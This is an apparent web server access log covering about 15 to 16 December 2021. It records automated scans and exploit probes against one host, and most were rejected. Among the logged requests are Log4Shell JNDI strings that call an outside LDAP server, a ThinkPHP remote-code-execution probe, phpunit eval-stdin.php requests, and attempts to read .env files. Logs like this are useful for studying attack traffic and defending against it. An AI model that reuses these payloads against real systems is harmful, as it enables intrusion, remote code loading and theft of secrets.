[Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; Moto G5 Plus (XT1681)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36" "-" [15/Dec/2021:03:53:34 +0000] 444 - GET https 64.22.31.253 "/nmaplowercheck1639540413" [Client 50.31.21.4] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; Moto G5 Plus (XT1681)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36" "-" [15/Dec/2021:03:53:35 +0000] 400 - HEAD http 64.22.31.253 "/" [Client 50.31.21.4] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; Moto G5 Plus (XT1681)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36" "-" [15/Dec/2021:03:53:35 +0000] 400 - GET http 64.22.31.253 "/nmaplowercheck1639540413" [Client 50.31.21.4] [Length 654] [Gzip -] "Mozilla/5.0 (Linux; Android 10; Moto G5 Plus (XT1681)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36" "-" [15/Dec/2021:03:53:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 50.31.21.4] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; Moto G5 Plus (XT1681)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36" "-" [15/Dec/2021:03:53:35 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 50.31.21.4] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; Moto G5 Plus (XT1681)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36" "-" [15/Dec/2021:03:53:35 +0000] 400 - GET http 64.22.31.253 "/" [Client 50.31.21.4] [Length 654] [Gzip -] "Mozilla/5.0 (Linux; Android 10; Moto G5 Plus (XT1681)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36" "-" [15/Dec/2021:03:53:35 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 50.31.21.4] [Length 654] [Gzip -] "Mozilla/5.0 (Linux; Android 10; Moto G5 Plus (XT1681)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36" "-" [15/Dec/2021:03:53:37 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 50.31.21.4] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10; Moto G5 Plus (XT1681)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36" "-" [15/Dec/2021:03:53:37 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 50.31.21.4] [Length 654] [Gzip -] "Mozilla/5.0 (Linux; Android 10; Moto G5 Plus (XT1681)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36" "-" [15/Dec/2021:03:56:22 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Dec/2021:04:07:46 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [15/Dec/2021:05:08:15 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Dec/2021:05:41:59 +0000] 400 - GET http localhost "/Dxo1" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:06:06:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [15/Dec/2021:06:20:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Dec/2021:07:09:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Dec/2021:07:34:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Dec/2021:07:44:08 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [15/Dec/2021:07:47:03 +0000] 400 - GET http localhost "/" [Client 147.182.187.185] [Length 252] [Gzip -] "-" "-" [15/Dec/2021:07:49:07 +0000] 400 - POST https localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:08:29:09 +0000] 444 - GET https webmail.moralanimal.net "/" [Client 82.165.67.178] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-" [15/Dec/2021:09:08:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Dec/2021:10:26:45 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 103.133.109.163] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [15/Dec/2021:10:59:51 +0000] 400 - - http localhost "-" [Client 31.207.47.5] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:11:09:06 +0000] 400 - - http localhost "-" [Client 87.251.64.137] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:11:28:03 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [15/Dec/2021:11:28:04 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [15/Dec/2021:11:31:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.174.3] [Length 0] [Gzip -] "curl/7.47.0" "-" [15/Dec/2021:11:31:54 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 89.248.174.3] [Length 0] [Gzip -] "curl/7.47.0" "-" [15/Dec/2021:12:10:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.254] [Length 0] [Gzip -] "-" "-" [15/Dec/2021:12:38:45 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [15/Dec/2021:12:39:46 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.214.143] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Dec/2021:12:44:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.9] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [15/Dec/2021:12:55:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 223.71.167.166] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [15/Dec/2021:12:55:28 +0000] 400 - GET http 64.22.31.253 "/" [Client 223.71.167.166] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [15/Dec/2021:12:56:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 223.71.167.166] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [15/Dec/2021:12:56:45 +0000] 400 - GET http 64.22.31.253 "/" [Client 223.71.167.166] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [15/Dec/2021:14:30:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.174.3] [Length 0] [Gzip -] "curl/7.47.0" "-" [15/Dec/2021:14:34:08 +0000] 400 - - http localhost "-" [Client 89.248.165.13] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:14:34:46 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 89.248.174.3] [Length 0] [Gzip -] "curl/7.47.0" "-" [15/Dec/2021:15:49:43 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:15:51:37 +0000] 444 - GET https 64.22.31.253 "/users/sign_in" [Client 103.247.21.18] [Length 0] [Gzip -] "-" "-" [15/Dec/2021:16:14:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.174.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [15/Dec/2021:17:22:10 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [15/Dec/2021:18:11:03 +0000] 400 - GET http localhost "/" [Client 8.210.223.192] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:18:19:06 +0000] 400 - - http localhost "-" [Client 87.251.64.137] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:18:30:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.42] [Length 0] [Gzip -] "-" "-" [15/Dec/2021:18:30:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.42] [Length 252] [Gzip -] "-" "-" [15/Dec/2021:18:30:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.42] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [15/Dec/2021:18:56:13 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Dec/2021:19:46:54 +0000] 444 - GET https 64.22.31.253 "/users/sign_in" [Client 68.168.220.92] [Length 0] [Gzip -] "-" "-" [15/Dec/2021:20:13:12 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Dec/2021:20:37:40 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:20:37:40 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [15/Dec/2021:20:45:10 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Dec/2021:21:33:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.44] [Length 0] [Gzip -] "-" "-" [15/Dec/2021:21:33:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.44] [Length 252] [Gzip -] "-" "-" [15/Dec/2021:21:33:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [15/Dec/2021:21:46:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Dec/2021:22:06:19 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Dec/2021:00:37:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 91.90.123.71] [Length 0] [Gzip -] "Opera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1" "-" [16/Dec/2021:01:23:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.220.101.51] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [16/Dec/2021:01:23:25 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.101.154] [Length 0] [Gzip -] "-" "-" [16/Dec/2021:01:23:27 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 192.42.116.17] [Length 0] [Gzip -] "-" "-" [16/Dec/2021:01:23:29 +0000] 400 - - https localhost "-" [Client 185.220.101.152] [Length 154] [Gzip -] "-" "-" [16/Dec/2021:01:23:41 +0000] 400 - - https localhost "-" [Client 185.220.101.152] [Length 154] [Gzip -] "-" "-" [16/Dec/2021:02:17:21 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [16/Dec/2021:02:20:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Dec/2021:02:27:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Dec/2021:02:55:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 109.74.194.205] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [16/Dec/2021:03:03:18 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:03:03:19 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:03:06:38 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:03:06:38 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:03:17:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.174.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [16/Dec/2021:03:36:46 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:03:36:46 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:03:57:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.8] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Dec/2021:03:58:47 +0000] 444 - GET https localhost "/" [Client 109.248.6.240] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [16/Dec/2021:04:07:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Dec/2021:05:46:33 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 69.197.185.43] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [16/Dec/2021:06:02:05 +0000] 400 - GET http localhost "/" [Client 80.82.70.228] [Length 252] [Gzip -] "BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123" "-" [16/Dec/2021:06:02:13 +0000] 400 - GET http 64.22.31.253 "/" [Client 5.8.10.202] [Length 252] [Gzip -] "fasthttp" "-" [16/Dec/2021:06:02:14 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [16/Dec/2021:06:02:14 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [16/Dec/2021:06:02:14 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [16/Dec/2021:06:02:15 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [16/Dec/2021:06:02:23 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [16/Dec/2021:06:02:23 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [16/Dec/2021:06:02:23 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [16/Dec/2021:06:02:24 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [16/Dec/2021:06:16:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [16/Dec/2021:06:16:24 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211216141624" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [16/Dec/2021:06:17:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.70] [Length 0] [Gzip -] "-" "-" [16/Dec/2021:06:58:26 +0000] 400 - - http localhost "-" [Client 137.135.91.208] [Length 154] [Gzip -] "-" "-" [16/Dec/2021:07:23:56 +0000] 400 - GET https localhost "/BYgZ" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [16/Dec/2021:07:44:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Dec/2021:08:29:00 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:08:29:01 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:08:48:40 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:08:48:41 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:09:42:41 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [16/Dec/2021:10:15:04 +0000] 400 - GET http localhost "/" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [16/Dec/2021:10:19:07 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:10:19:07 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:12:46:20 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [16/Dec/2021:12:50:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [16/Dec/2021:12:57:39 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Dec/2021:13:13:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Dec/2021:14:24:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 5.188.206.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "-" [16/Dec/2021:14:42:20 +0000] 444 - POST https 64.22.31.253 "/owa/auth.owa" [Client 75.109.178.245] [Length 0] [Gzip -] "python-requests/2.25.1" "-" [16/Dec/2021:16:27:07 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 107.150.63.174] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [16/Dec/2021:16:36:40 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [16/Dec/2021:16:36:41 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [16/Dec/2021:16:37:59 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Dec/2021:17:52:05 +0000] 444 - GET https 64.22.31.253 "/${jndi:ldap://31.131.16.127:1389/Exploit}" [Client 46.105.95.220] [Length 0] [Gzip -] "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" "-" [16/Dec/2021:17:52:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 46.105.95.220] [Length 0] [Gzip -] "${jndi:ldap://31.131.16.127:1389/Exploit}" "-" [16/Dec/2021:17:52:06 +0000] 444 - POST https 64.22.31.253 "/login" [Client 46.105.95.220] [Length 0] [Gzip -] "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" "-" [16/Dec/2021:17:52:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 46.105.95.220] [Length 0] [Gzip -] "curl/7.58.0" "-" [16/Dec/2021:18:03:42 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [16/Dec/2021:18:13:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Dec/2021:18:20:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.60] [Length 0] [Gzip -] "-" "-" [16/Dec/2021:18:20:27 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.60] [Length 252] [Gzip -] "-" "-" [16/Dec/2021:18:20:27 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [16/Dec/2021:18:28:38 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Dec/2021:18:28:39 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 